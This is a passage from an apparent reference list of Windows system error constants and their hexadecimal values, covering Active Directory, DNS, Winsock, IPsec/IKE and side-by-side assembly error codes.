- ERROR_DS_SAM_NEED_BOOTKEY_FLOPPY = 0x2152 - ERROR_DS_CANT_START = 0x2153 - ERROR_DS_INIT_FAILURE = 0x2154 - ERROR_DS_NO_PKT_PRIVACY_ON_CONNECTION = 0x2155 - ERROR_DS_SOURCE_DOMAIN_IN_FOREST = 0x2156 - ERROR_DS_DESTINATION_DOMAIN_NOT_IN_FOREST = 0x2157 - ERROR_DS_DESTINATION_AUDITING_NOT_ENABLED = 0x2158 - ERROR_DS_CANT_FIND_DC_FOR_SRC_DOMAIN = 0x2159 - ERROR_DS_SRC_OBJ_NOT_GROUP_OR_USER = 0x215A - ERROR_DS_SRC_SID_EXISTS_IN_FOREST = 0x215B - ERROR_DS_SRC_AND_DST_OBJECT_CLASS_MISMATCH = 0x215C - ERROR_SAM_INIT_FAILURE = 0x215D - ERROR_DS_DRA_SCHEMA_INFO_SHIP = 0x215E - ERROR_DS_DRA_SCHEMA_CONFLICT = 0x215F - ERROR_DS_DRA_EARLIER_SCHEMA_CONLICT = 0x2160 - ERROR_DS_DRA_OBJ_NC_MISMATCH = 0x2161 - ERROR_DS_NC_STILL_HAS_DSAS = 0x2162 - ERROR_DS_GC_REQUIRED = 0x2163 - ERROR_DS_LOCAL_MEMBER_OF_LOCAL_ONLY = 0x2164 - ERROR_DS_NO_FPO_IN_UNIVERSAL_GROUPS = 0x2165 - ERROR_DS_CANT_ADD_TO_GC = 0x2166 - ERROR_DS_NO_CHECKPOINT_WITH_PDC = 0x2167 - ERROR_DS_SOURCE_AUDITING_NOT_ENABLED = 0x2168 - ERROR_DS_CANT_CREATE_IN_NONDOMAIN_NC = 0x2169 - ERROR_DS_INVALID_NAME_FOR_SPN = 0x216A - ERROR_DS_FILTER_USES_CONTRUCTED_ATTRS = 0x216B - ERROR_DS_UNICODEPWD_NOT_IN_QUOTES = 0x216C - ERROR_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED = 0x216D - ERROR_DS_MUST_BE_RUN_ON_DST_DC = 0x216E - ERROR_DS_SRC_DC_MUST_BE_SP4_OR_GREATER = 0x216F - ERROR_DS_CANT_TREE_DELETE_CRITICAL_OBJ = 0x2170 - ERROR_DS_INIT_FAILURE_CONSOLE = 0x2171 - ERROR_DS_SAM_INIT_FAILURE_CONSOLE = 0x2172 - ERROR_DS_FOREST_VERSION_TOO_HIGH = 0x2173 - ERROR_DS_DOMAIN_VERSION_TOO_HIGH = 0x2174 - ERROR_DS_FOREST_VERSION_TOO_LOW = 0x2175 - ERROR_DS_DOMAIN_VERSION_TOO_LOW = 0x2176 - ERROR_DS_INCOMPATIBLE_VERSION = 0x2177 - ERROR_DS_LOW_DSA_VERSION = 0x2178 - ERROR_DS_NO_BEHAVIOR_VERSION_IN_MIXEDDOMAIN = 0x2179 - ERROR_DS_NOT_SUPPORTED_SORT_ORDER = 0x217A - ERROR_DS_NAME_NOT_UNIQUE = 0x217B - ERROR_DS_MACHINE_ACCOUNT_CREATED_PRENT4 = 0x217C - ERROR_DS_OUT_OF_VERSION_STORE = 0x217D - ERROR_DS_INCOMPATIBLE_CONTROLS_USED = 0x217E - ERROR_DS_NO_REF_DOMAIN = 0x217F - ERROR_DS_RESERVED_LINK_ID = 0x2180 - ERROR_DS_LINK_ID_NOT_AVAILABLE = 0x2181 - ERROR_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER = 0x2182 - ERROR_DS_MODIFYDN_DISALLOWED_BY_INSTANCE_TYPE = 0x2183 - ERROR_DS_NO_OBJECT_MOVE_IN_SCHEMA_NC = 0x2184 - ERROR_DS_MODIFYDN_DISALLOWED_BY_FLAG = 0x2185 - ERROR_DS_MODIFYDN_WRONG_GRANDPARENT = 0x2186 - ERROR_DS_NAME_ERROR_TRUST_REFERRAL = 0x2187 - ERROR_NOT_SUPPORTED_ON_STANDARD_SERVER = 0x2188 - ERROR_DS_CANT_ACCESS_REMOTE_PART_OF_AD = 0x2189 - ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE_V2 = 0x218A - ERROR_DS_THREAD_LIMIT_EXCEEDED = 0x218B - ERROR_DS_NOT_CLOSEST = 0x218C - ERROR_DS_CANT_DERIVE_SPN_WITHOUT_SERVER_REF = 0x218D - ERROR_DS_SINGLE_USER_MODE_FAILED = 0x218E - ERROR_DS_NTDSCRIPT_SYNTAX_ERROR = 0x218F - ERROR_DS_NTDSCRIPT_PROCESS_ERROR = 0x2190 - ERROR_DS_DIFFERENT_REPL_EPOCHS = 0x2191 - ERROR_DS_DRS_EXTENSIONS_CHANGED = 0x2192 - ERROR_DS_REPLICA_SET_CHANGE_NOT_ALLOWED_ON_DISABLED_CR = 0x2193 - ERROR_DS_NO_MSDS_INTID = 0x2194 - ERROR_DS_DUP_MSDS_INTID = 0x2195 - ERROR_DS_EXISTS_IN_RDNATTID = 0x2196 - ERROR_DS_AUTHORIZATION_FAILED = 0x2197 - ERROR_DS_INVALID_SCRIPT = 0x2198 - ERROR_DS_REMOTE_CROSSREF_OP_FAILED = 0x2199 - ERROR_DS_CROSS_REF_BUSY = 0x219A - ERROR_DS_CANT_DERIVE_SPN_FOR_DELETED_DOMAIN = 0x219B - ERROR_DS_CANT_DEMOTE_WITH_WRITEABLE_NC = 0x219C - ERROR_DS_DUPLICATE_ID_FOUND = 0x219D - ERROR_DS_INSUFFICIENT_ATTR_TO_CREATE_OBJECT = 0x219E - ERROR_DS_GROUP_CONVERSION_ERROR = 0x219F - ERROR_DS_CANT_MOVE_APP_BASIC_GROUP = 0x21A0 - ERROR_DS_CANT_MOVE_APP_QUERY_GROUP = 0x21A1 - ERROR_DS_ROLE_NOT_VERIFIED = 0x21A2 - ERROR_DS_WKO_CONTAINER_CANNOT_BE_SPECIAL = 0x21A3 - ERROR_DS_DOMAIN_RENAME_IN_PROGRESS = 0x21A4 - ERROR_DS_EXISTING_AD_CHILD_NC = 0x21A5 - ERROR_DS_REPL_LIFETIME_EXCEEDED = 0x21A6 - ERROR_DS_DISALLOWED_IN_SYSTEM_CONTAINER = 0x21A7 - ERROR_DS_LDAP_SEND_QUEUE_FULL = 0x21A8 - ERROR_DS_DRA_OUT_SCHEDULE_WINDOW = 0x21A9 - ERROR_DS_POLICY_NOT_KNOWN = 0x21AA - ERROR_NO_SITE_SETTINGS_OBJECT = 0x21AB - ERROR_NO_SECRETS = 0x21AC - ERROR_NO_WRITABLE_DC_FOUND = 0x21AD - ERROR_DS_NO_SERVER_OBJECT = 0x21AE - ERROR_DS_NO_NTDSA_OBJECT = 0x21AF - ERROR_DS_NON_ASQ_SEARCH = 0x21B0 - ERROR_DS_AUDIT_FAILURE = 0x21B1 - ERROR_DS_INVALID_SEARCH_FLAG_SUBTREE = 0x21B2 - ERROR_DS_INVALID_SEARCH_FLAG_TUPLE = 0x21B3 - ERROR_DS_HIERARCHY_TABLE_TOO_DEEP = 0x21B4 - ERROR_DS_DRA_CORRUPT_UTD_VECTOR = 0x21B5 - ERROR_DS_DRA_SECRETS_DENIED = 0x21B6 - ERROR_DS_RESERVED_MAPI_ID = 0x21B7 - ERROR_DS_MAPI_ID_NOT_AVAILABLE = 0x21B8 - ERROR_DS_DRA_MISSING_KRBTGT_SECRET = 0x21B9 - ERROR_DS_DOMAIN_NAME_EXISTS_IN_FOREST = 0x21BA - ERROR_DS_FLAT_NAME_EXISTS_IN_FOREST = 0x21BB - ERROR_INVALID_USER_PRINCIPAL_NAME = 0x21BC - ERROR_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS = 0x21BD - ERROR_DS_OID_NOT_FOUND = 0x21BE - ERROR_DS_DRA_RECYCLED_TARGET = 0x21BF - DNS_ERROR_RCODE_FORMAT_ERROR = 0x2329 - DNS_ERROR_RCODE_SERVER_FAILURE = 0x232A - DNS_ERROR_RCODE_NAME_ERROR = 0x232B - DNS_ERROR_RCODE_NOT_IMPLEMENTED = 0x232C - DNS_ERROR_RCODE_REFUSED = 0x232D - DNS_ERROR_RCODE_YXDOMAIN = 0x232E - DNS_ERROR_RCODE_YXRRSET = 0x232F - DNS_ERROR_RCODE_NXRRSET = 0x2330 - DNS_ERROR_RCODE_NOTAUTH = 0x2331 - DNS_ERROR_RCODE_NOTZONE = 0x2332 - DNS_ERROR_RCODE_BADSIG = 0x2338 - DNS_ERROR_RCODE_BADKEY = 0x2339 - DNS_ERROR_RCODE_BADTIME = 0x233A - DNS_INFO_NO_RECORDS = 0x251D - DNS_ERROR_BAD_PACKET = 0x251E - DNS_ERROR_NO_PACKET = 0x251F - DNS_ERROR_RCODE = 0x2520 - DNS_ERROR_UNSECURE_PACKET = 0x2521 - DNS_ERROR_INVALID_TYPE = 0x254F - DNS_ERROR_INVALID_IP_ADDRESS = 0x2550 - DNS_ERROR_INVALID_PROPERTY = 0x2551 - DNS_ERROR_TRY_AGAIN_LATER = 0x2552 - DNS_ERROR_NOT_UNIQUE = 0x2553 - DNS_ERROR_NON_RFC_NAME = 0x2554 - DNS_STATUS_FQDN = 0x2555 - DNS_STATUS_DOTTED_NAME = 0x2556 - DNS_STATUS_SINGLE_PART_NAME = 0x2557 - DNS_ERROR_INVALID_NAME_CHAR = 0x2558 - DNS_ERROR_NUMERIC_NAME = 0x2559 - DNS_ERROR_NOT_ALLOWED_ON_ROOT_SERVER = 0x255A - DNS_ERROR_NOT_ALLOWED_UNDER_DELEGATION = 0x255B - DNS_ERROR_CANNOT_FIND_ROOT_HINTS = 0x255C - DNS_ERROR_INCONSISTENT_ROOT_HINTS = 0x255D - DNS_ERROR_DWORD_VALUE_TOO_SMALL = 0x255E - DNS_ERROR_DWORD_VALUE_TOO_LARGE = 0x255F - DNS_ERROR_BACKGROUND_LOADING = 0x2560 - DNS_ERROR_NOT_ALLOWED_ON_RODC = 0x2561 - DNS_ERROR_NOT_ALLOWED_UNDER_DNAME = 0x2562 - DNS_ERROR_DELEGATION_REQUIRED = 0x2563 - DNS_ERROR_INVALID_POLICY_TABLE = 0x2564 - DNS_ERROR_ZONE_DOES_NOT_EXIST = 0x2581 - DNS_ERROR_NO_ZONE_INFO = 0x2582 - DNS_ERROR_INVALID_ZONE_OPERATION = 0x2583 - DNS_ERROR_ZONE_CONFIGURATION_ERROR = 0x2584 - DNS_ERROR_ZONE_HAS_NO_SOA_RECORD = 0x2585 - DNS_ERROR_ZONE_HAS_NO_NS_RECORDS = 0x2586 - DNS_ERROR_ZONE_LOCKED = 0x2587 - DNS_ERROR_ZONE_CREATION_FAILED = 0x2588 - DNS_ERROR_ZONE_ALREADY_EXISTS = 0x2589 - DNS_ERROR_AUTOZONE_ALREADY_EXISTS = 0x258A - DNS_ERROR_INVALID_ZONE_TYPE = 0x258B - DNS_ERROR_SECONDARY_REQUIRES_MASTER_IP = 0x258C - DNS_ERROR_ZONE_NOT_SECONDARY = 0x258D - DNS_ERROR_NEED_SECONDARY_ADDRESSES = 0x258E - DNS_ERROR_WINS_INIT_FAILED = 0x258F - DNS_ERROR_NEED_WINS_SERVERS = 0x2590 - DNS_ERROR_NBSTAT_INIT_FAILED = 0x2591 - DNS_ERROR_SOA_DELETE_INVALID = 0x2592 - DNS_ERROR_FORWARDER_ALREADY_EXISTS = 0x2593 - DNS_ERROR_ZONE_REQUIRES_MASTER_IP = 0x2594 - DNS_ERROR_ZONE_IS_SHUTDOWN = 0x2595 - DNS_ERROR_PRIMARY_REQUIRES_DATAFILE = 0x25B3 - DNS_ERROR_INVALID_DATAFILE_NAME = 0x25B4 - DNS_ERROR_DATAFILE_OPEN_FAILURE = 0x25B5 - DNS_ERROR_FILE_WRITEBACK_FAILED = 0x25B6 - DNS_ERROR_DATAFILE_PARSING = 0x25B7 - DNS_ERROR_RECORD_DOES_NOT_EXIST = 0x25E5 - DNS_ERROR_RECORD_FORMAT = 0x25E6 - DNS_ERROR_NODE_CREATION_FAILED = 0x25E7 - DNS_ERROR_UNKNOWN_RECORD_TYPE = 0x25E8 - DNS_ERROR_RECORD_TIMED_OUT = 0x25E9 - DNS_ERROR_NAME_NOT_IN_ZONE = 0x25EA - DNS_ERROR_CNAME_LOOP = 0x25EB - DNS_ERROR_NODE_IS_CNAME = 0x25EC - DNS_ERROR_CNAME_COLLISION = 0x25ED - DNS_ERROR_RECORD_ONLY_AT_ZONE_ROOT = 0x25EE - DNS_ERROR_RECORD_ALREADY_EXISTS = 0x25EF - DNS_ERROR_SECONDARY_DATA = 0x25F0 - DNS_ERROR_NO_CREATE_CACHE_DATA = 0x25F1 - DNS_ERROR_NAME_DOES_NOT_EXIST = 0x25F2 - DNS_WARNING_PTR_CREATE_FAILED = 0x25F3 - DNS_WARNING_DOMAIN_UNDELETED = 0x25F4 - DNS_ERROR_DS_UNAVAILABLE = 0x25F5 - DNS_ERROR_DS_ZONE_ALREADY_EXISTS = 0x25F6 - DNS_ERROR_NO_BOOTFILE_IF_DS_ZONE = 0x25F7 - DNS_ERROR_NODE_IS_DNAME = 0x25F8 - DNS_ERROR_DNAME_COLLISION = 0x25F9 - DNS_ERROR_ALIAS_LOOP = 0x25FA - DNS_INFO_AXFR_COMPLETE = 0x2617 - DNS_ERROR_AXFR = 0x2618 - DNS_INFO_ADDED_LOCAL_WINS = 0x2619 - DNS_STATUS_CONTINUE_NEEDED = 0x2649 - DNS_ERROR_NO_TCPIP = 0x267B - DNS_ERROR_NO_DNS_SERVERS = 0x267C - DNS_ERROR_DP_DOES_NOT_EXIST = 0x26AD - DNS_ERROR_DP_ALREADY_EXISTS = 0x26AE - DNS_ERROR_DP_NOT_ENLISTED = 0x26AF - DNS_ERROR_DP_ALREADY_ENLISTED = 0x26B0 - DNS_ERROR_DP_NOT_AVAILABLE = 0x26B1 - DNS_ERROR_DP_FSMO_ERROR = 0x26B2 - WSAEINTR = 0x2714 - WSAEBADF = 0x2719 - WSAEACCES = 0x271D - WSAEFAULT = 0x271E - WSAEINVAL = 0x2726 - WSAEMFILE = 0x2728 - WSAEWOULDBLOCK = 0x2733 - WSAEINPROGRESS = 0x2734 - WSAEALREADY = 0x2735 - WSAENOTSOCK = 0x2736 - WSAEDESTADDRREQ = 0x2737 - WSAEMSGSIZE = 0x2738 - WSAEPROTOTYPE = 0x2739 - WSAENOPROTOOPT = 0x273A - WSAEPROTONOSUPPORT = 0x273B - WSAESOCKTNOSUPPORT = 0x273C - WSAEOPNOTSUPP = 0x273D - WSAEPFNOSUPPORT = 0x273E - WSAEAFNOSUPPORT = 0x273F - WSAEADDRINUSE = 0x2740 - WSAEADDRNOTAVAIL = 0x2741 - WSAENETDOWN = 0x2742 - WSAENETUNREACH = 0x2743 - WSAENETRESET = 0x2744 - WSAECONNABORTED = 0x2745 - WSAECONNRESET = 0x2746 - WSAENOBUFS = 0x2747 - WSAEISCONN = 0x2748 - WSAENOTCONN = 0x2749 - WSAESHUTDOWN = 0x274A - WSAETOOMANYREFS = 0x274B - WSAETIMEDOUT = 0x274C - WSAECONNREFUSED = 0x274D - WSAELOOP = 0x274E - WSAENAMETOOLONG = 0x274F - WSAEHOSTDOWN = 0x2750 - WSAEHOSTUNREACH = 0x2751 - WSAENOTEMPTY = 0x2752 - WSAEPROCLIM = 0x2753 - WSAEUSERS = 0x2754 - WSAEDQUOT = 0x2755 - WSAESTALE = 0x2756 - WSAEREMOTE = 0x2757 - WSASYSNOTREADY = 0x276B - WSAVERNOTSUPPORTED = 0x276C - WSANOTINITIALISED = 0x276D - WSAEDISCON = 0x2775 - WSAENOMORE = 0x2776 - WSAECANCELLED = 0x2777 - WSAEINVALIDPROCTABLE = 0x2778 - WSAEINVALIDPROVIDER = 0x2779 - WSAEPROVIDERFAILEDINIT = 0x277A - WSASYSCALLFAILURE = 0x277B - WSASERVICE_NOT_FOUND = 0x277C - WSATYPE_NOT_FOUND = 0x277D - WSA_E_NO_MORE = 0x277E - WSA_E_CANCELLED = 0x277F - WSAEREFUSED = 0x2780 - WSAHOST_NOT_FOUND = 0x2AF9 - WSATRY_AGAIN = 0x2AFA - WSANO_RECOVERY = 0x2AFB - WSANO_DATA = 0x2AFC - WSA_QOS_RECEIVERS = 0x2AFD - WSA_QOS_SENDERS = 0x2AFE - WSA_QOS_NO_SENDERS = 0x2AFF - WSA_QOS_NO_RECEIVERS = 0x2B00 - WSA_QOS_REQUEST_CONFIRMED = 0x2B01 - WSA_QOS_ADMISSION_FAILURE = 0x2B02 - WSA_QOS_POLICY_FAILURE = 0x2B03 - WSA_QOS_BAD_STYLE = 0x2B04 - WSA_QOS_BAD_OBJECT = 0x2B05 - WSA_QOS_TRAFFIC_CTRL_ERROR = 0x2B06 - WSA_QOS_GENERIC_ERROR = 0x2B07 - WSA_QOS_ESERVICETYPE = 0x2B08 - WSA_QOS_EFLOWSPEC = 0x2B09 - WSA_QOS_EPROVSPECBUF = 0x2B0A - WSA_QOS_EFILTERSTYLE = 0x2B0B - WSA_QOS_EFILTERTYPE = 0x2B0C - WSA_QOS_EFILTERCOUNT = 0x2B0D - WSA_QOS_EOBJLENGTH = 0x2B0E - WSA_QOS_EFLOWCOUNT = 0x2B0F - WSA_QOS_EUNKNOWNPSOBJ = 0x2B10 - WSA_QOS_EPOLICYOBJ = 0x2B11 - WSA_QOS_EFLOWDESC = 0x2B12 - WSA_QOS_EPSFLOWSPEC = 0x2B13 - WSA_QOS_EPSFILTERSPEC = 0x2B14 - WSA_QOS_ESDMODEOBJ = 0x2B15 - WSA_QOS_ESHAPERATEOBJ = 0x2B16 - WSA_QOS_RESERVED_PETYPE = 0x2B17 - ERROR_IPSEC_QM_POLICY_EXISTS = 0x32C8 - ERROR_IPSEC_QM_POLICY_NOT_FOUND = 0x32C9 - ERROR_IPSEC_QM_POLICY_IN_USE = 0x32CA - ERROR_IPSEC_MM_POLICY_EXISTS = 0x32CB - ERROR_IPSEC_MM_POLICY_NOT_FOUND = 0x32CC - ERROR_IPSEC_MM_POLICY_IN_USE = 0x32CD - ERROR_IPSEC_MM_FILTER_EXISTS = 0x32CE - ERROR_IPSEC_MM_FILTER_NOT_FOUND = 0x32CF - ERROR_IPSEC_TRANSPORT_FILTER_EXISTS = 0x32D0 - ERROR_IPSEC_TRANSPORT_FILTER_NOT_FOUND = 0x32D1 - ERROR_IPSEC_MM_AUTH_EXISTS = 0x32D2 - ERROR_IPSEC_MM_AUTH_NOT_FOUND = 0x32D3 - ERROR_IPSEC_MM_AUTH_IN_USE = 0x32D4 - ERROR_IPSEC_DEFAULT_MM_POLICY_NOT_FOUND = 0x32D5 - ERROR_IPSEC_DEFAULT_MM_AUTH_NOT_FOUND = 0x32D6 - ERROR_IPSEC_DEFAULT_QM_POLICY_NOT_FOUND = 0x32D7 - ERROR_IPSEC_TUNNEL_FILTER_EXISTS = 0x32D8 - ERROR_IPSEC_TUNNEL_FILTER_NOT_FOUND = 0x32D9 - ERROR_IPSEC_MM_FILTER_PENDING_DELETION = 0x32DA - ERROR_IPSEC_TRANSPORT_FILTER_PENDING_DELETION = 0x32DB - ERROR_IPSEC_TUNNEL_FILTER_PENDING_DELETION = 0x32DC - ERROR_IPSEC_MM_POLICY_PENDING_DELETION = 0x32DD - ERROR_IPSEC_MM_AUTH_PENDING_DELETION = 0x32DE - ERROR_IPSEC_QM_POLICY_PENDING_DELETION = 0x32DF - WARNING_IPSEC_MM_POLICY_PRUNED = 0x32E0 - WARNING_IPSEC_QM_POLICY_PRUNED = 0x32E1 - ERROR_IPSEC_IKE_AUTH_FAIL = 0x35E9 - ERROR_IPSEC_IKE_ATTRIB_FAIL = 0x35EA - ERROR_IPSEC_IKE_NEGOTIATION_PENDING = 0x35EB - ERROR_IPSEC_IKE_GENERAL_PROCESSING_ERROR = 0x35EC - ERROR_IPSEC_IKE_TIMED_OUT = 0x35ED - ERROR_IPSEC_IKE_NO_CERT = 0x35EE - ERROR_IPSEC_IKE_SA_DELETED = 0x35EF - ERROR_IPSEC_IKE_SA_REAPED = 0x35F0 - ERROR_IPSEC_IKE_MM_ACQUIRE_DROP = 0x35F1 - ERROR_IPSEC_IKE_QM_ACQUIRE_DROP = 0x35F2 - ERROR_IPSEC_IKE_QUEUE_DROP_MM = 0x35F3 - ERROR_IPSEC_IKE_QUEUE_DROP_NO_MM = 0x35F4 - ERROR_IPSEC_IKE_DROP_NO_RESPONSE = 0x35F5 - ERROR_IPSEC_IKE_MM_DELAY_DROP = 0x35F6 - ERROR_IPSEC_IKE_QM_DELAY_DROP = 0x35F7 - ERROR_IPSEC_IKE_ERROR = 0x35F8 - ERROR_IPSEC_IKE_CRL_FAILED = 0x35F9 - ERROR_IPSEC_IKE_INVALID_KEY_USAGE = 0x35FA - ERROR_IPSEC_IKE_INVALID_CERT_TYPE = 0x35FB - ERROR_IPSEC_IKE_NO_PRIVATE_KEY = 0x35FC - ERROR_IPSEC_IKE_DH_FAIL = 0x35FE - ERROR_IPSEC_IKE_CRITICAL_PAYLOAD_NOT_RECOGNIZED = 0x35FF - ERROR_IPSEC_IKE_INVALID_HEADER = 0x3600 - ERROR_IPSEC_IKE_NO_POLICY = 0x3601 - ERROR_IPSEC_IKE_INVALID_SIGNATURE = 0x3602 - ERROR_IPSEC_IKE_KERBEROS_ERROR = 0x3603 - ERROR_IPSEC_IKE_NO_PUBLIC_KEY = 0x3604 - ERROR_IPSEC_IKE_PROCESS_ERR = 0x3605 - ERROR_IPSEC_IKE_PROCESS_ERR_SA = 0x3606 - ERROR_IPSEC_IKE_PROCESS_ERR_PROP = 0x3607 - ERROR_IPSEC_IKE_PROCESS_ERR_TRANS = 0x3608 - ERROR_IPSEC_IKE_PROCESS_ERR_KE = 0x3609 - ERROR_IPSEC_IKE_PROCESS_ERR_ID = 0x360A - ERROR_IPSEC_IKE_PROCESS_ERR_CERT = 0x360B - ERROR_IPSEC_IKE_PROCESS_ERR_CERT_REQ = 0x360C - ERROR_IPSEC_IKE_PROCESS_ERR_HASH = 0x360D - ERROR_IPSEC_IKE_PROCESS_ERR_SIG = 0x360E - ERROR_IPSEC_IKE_PROCESS_ERR_NONCE = 0x360F - ERROR_IPSEC_IKE_PROCESS_ERR_NOTIFY = 0x3610 - ERROR_IPSEC_IKE_PROCESS_ERR_DELETE = 0x3611 - ERROR_IPSEC_IKE_PROCESS_ERR_VENDOR = 0x3612 - ERROR_IPSEC_IKE_INVALID_PAYLOAD = 0x3613 - ERROR_IPSEC_IKE_LOAD_SOFT_SA = 0x3614 - ERROR_IPSEC_IKE_SOFT_SA_TORN_DOWN = 0x3615 - ERROR_IPSEC_IKE_INVALID_COOKIE = 0x3616 - ERROR_IPSEC_IKE_NO_PEER_CERT = 0x3617 - ERROR_IPSEC_IKE_PEER_CRL_FAILED = 0x3618 - ERROR_IPSEC_IKE_POLICY_CHANGE = 0x3619 - ERROR_IPSEC_IKE_NO_MM_POLICY = 0x361A - ERROR_IPSEC_IKE_NOTCBPRIV = 0x361B - ERROR_IPSEC_IKE_SECLOADFAIL = 0x361C - ERROR_IPSEC_IKE_FAILSSPINIT = 0x361D - ERROR_IPSEC_IKE_FAILQUERYSSP = 0x361E - ERROR_IPSEC_IKE_SRVACQFAIL = 0x361F - ERROR_IPSEC_IKE_SRVQUERYCRED = 0x3620 - ERROR_IPSEC_IKE_GETSPIFAIL = 0x3621 - ERROR_IPSEC_IKE_INVALID_FILTER = 0x3622 - ERROR_IPSEC_IKE_OUT_OF_MEMORY = 0x3623 - ERROR_IPSEC_IKE_ADD_UPDATE_KEY_FAILED = 0x3624 - ERROR_IPSEC_IKE_INVALID_POLICY = 0x3625 - ERROR_IPSEC_IKE_UNKNOWN_DOI = 0x3626 - ERROR_IPSEC_IKE_INVALID_SITUATION = 0x3627 - ERROR_IPSEC_IKE_DH_FAILURE = 0x3628 - ERROR_IPSEC_IKE_INVALID_GROUP = 0x3629 - ERROR_IPSEC_IKE_ENCRYPT = 0x362A - ERROR_IPSEC_IKE_DECRYPT = 0x362B - ERROR_IPSEC_IKE_POLICY_MATCH = 0x362C - ERROR_IPSEC_IKE_UNSUPPORTED_ID = 0x362D - ERROR_IPSEC_IKE_INVALID_HASH = 0x362E - ERROR_IPSEC_IKE_INVALID_HASH_ALG = 0x362F - ERROR_IPSEC_IKE_INVALID_HASH_SIZE = 0x3630 - ERROR_IPSEC_IKE_INVALID_ENCRYPT_ALG = 0x3631 - ERROR_IPSEC_IKE_INVALID_AUTH_ALG = 0x3632 - ERROR_IPSEC_IKE_INVALID_SIG = 0x3633 - ERROR_IPSEC_IKE_LOAD_FAILED = 0x3634 - ERROR_IPSEC_IKE_RPC_DELETE = 0x3635 - ERROR_IPSEC_IKE_BENIGN_REINIT = 0x3636 - ERROR_IPSEC_IKE_INVALID_RESPONDER_LIFETIME_NOTIFY = 0x3637 - ERROR_IPSEC_IKE_QM_LIMIT_REAP = 0x3638 - ERROR_IPSEC_IKE_INVALID_CERT_KEYLEN = 0x3639 - ERROR_IPSEC_IKE_MM_LIMIT = 0x363A - ERROR_IPSEC_IKE_NEGOTIATION_DISABLED = 0x363B - ERROR_IPSEC_IKE_QM_LIMIT = 0x363C - ERROR_IPSEC_IKE_MM_EXPIRED = 0x363D - ERROR_IPSEC_IKE_PEER_MM_ASSUMED_INVALID = 0x363E - ERROR_IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH = 0x363F - ERROR_IPSEC_IKE_UNEXPECTED_MESSAGE_ID = 0x3640 - ERROR_IPSEC_IKE_INVALID_AUTH_PAYLOAD = 0x3641 - ERROR_IPSEC_IKE_DOS_COOKIE_SENT = 0x3642 - ERROR_IPSEC_IKE_SHUTTING_DOWN = 0x3643 - ERROR_IPSEC_IKE_CGA_AUTH_FAILED = 0x3644 - ERROR_IPSEC_IKE_PROCESS_ERR_NATOA = 0x3645 - ERROR_IPSEC_IKE_INVALID_MM_FOR_QM = 0x3646 - ERROR_IPSEC_IKE_QM_EXPIRED = 0x3647 - ERROR_IPSEC_IKE_TOO_MANY_FILTERS = 0x3648 - ERROR_IPSEC_IKE_NEG_STATUS_END = 0x3649 - ERROR_IPSEC_IKE_KILL_DUMMY_NAP_TUNNEL = 0x364A - ERROR_IPSEC_IKE_INNER_IP_ASSIGNMENT_FAILURE = 0x364B - ERROR_IPSEC_IKE_REQUIRE_CP_PAYLOAD_MISSING = 0x364C - ERROR_IPSEC_KEY_MODULE_IMPERSONATION_NEGOTIATION_PENDING = 0x364D - ERROR_IPSEC_IKE_COEXISTENCE_SUPPRESS = 0x364E - ERROR_IPSEC_IKE_RATELIMIT_DROP = 0x364F - ERROR_IPSEC_IKE_PEER_DOESNT_SUPPORT_MOBIKE = 0x3650 - ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE = 0x3651 - ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_FAILURE = 0x3652 - ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE_WITH_OPTIONAL_RETRY = 0x3653 - ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_AND_CERTMAP_FAILURE = 0x3654 - ERROR_IPSEC_BAD_SPI = 0x3656 - ERROR_IPSEC_SA_LIFETIME_EXPIRED = 0x3657 - ERROR_IPSEC_WRONG_SA = 0x3658 - ERROR_IPSEC_REPLAY_CHECK_FAILED = 0x3659 - ERROR_IPSEC_INVALID_PACKET = 0x365A - ERROR_IPSEC_INTEGRITY_CHECK_FAILED = 0x365B - ERROR_IPSEC_CLEAR_TEXT_DROP = 0x365C - ERROR_IPSEC_AUTH_FIREWALL_DROP = 0x365D - ERROR_IPSEC_THROTTLE_DROP = 0x365E - ERROR_IPSEC_DOSP_BLOCK = 0x3665 - ERROR_IPSEC_DOSP_RECEIVED_MULTICAST = 0x3666 - ERROR_IPSEC_DOSP_INVALID_PACKET = 0x3667 - ERROR_IPSEC_DOSP_STATE_LOOKUP_FAILED = 0x3668 - ERROR_IPSEC_DOSP_MAX_ENTRIES = 0x3669 - ERROR_IPSEC_DOSP_KEYMOD_NOT_ALLOWED = 0x366A - ERROR_IPSEC_DOSP_NOT_INSTALLED = 0x366B - ERROR_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES = 0x366C - ERROR_SXS_SECTION_NOT_FOUND = 0x36B0 - ERROR_SXS_CANT_GEN_ACTCTX = 0x36B1 - ERROR_SXS_INVALID_ACTCTXDATA_FORMAT = 0x36B2 - ERROR_SXS_ASSEMBLY_NOT_FOUND = 0x36B3 - ERROR_SXS_MANIFEST_FORMAT_ERROR = 0x36B4 - ERROR_SXS_MANIFEST_PARSE_ERROR = 0x36B5 - ERROR_SXS_ACTIVATION_CONTEXT_DISABLED = 0x36B6 - ERROR_SXS_KEY_NOT_FOUND = 0x36B7 - ERROR_SXS_VERSION_CONFLICT = 0x36B8 - ERROR_SXS_WRONG_SECTION_TYPE = 0x36B9 - ERROR_SXS_THREAD_QUERIES_DISABLED = 0x36BA - ERROR_SXS_PROCESS_DEFAULT_ALREADY_SET = 0x36BB - ERROR_SXS_UNKNOWN_ENCODING_GROUP = 0x36BC - ERROR_SXS_UNKNOWN_ENCODING = 0x36BD - ERROR_SXS_INVALID_XML_NAMESPACE_URI = 0x36BE - ERROR_SXS_ROOT_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36BF - ERROR_SXS_LEAF_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36C0 - ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36C1 - ERROR_SXS_MANIFEST_MISSING_REQUIRED_DEFAULT_NAMESPACE = 0x36C2 - ERROR_SXS_MANIFEST_INVALID_REQUIRED_DEFAULT_NAMESPACE = 0x36C3 - ERROR_SXS_PRIVATE_MANIFEST_CROSS_PATH_WITH_REPARSE_POINT = 0x36C4 - ERROR_SXS_DUPLICATE_DLL_NAME = 0x36C5 - ERROR_SXS_DUPLICATE_WINDOWCLASS_NAME = 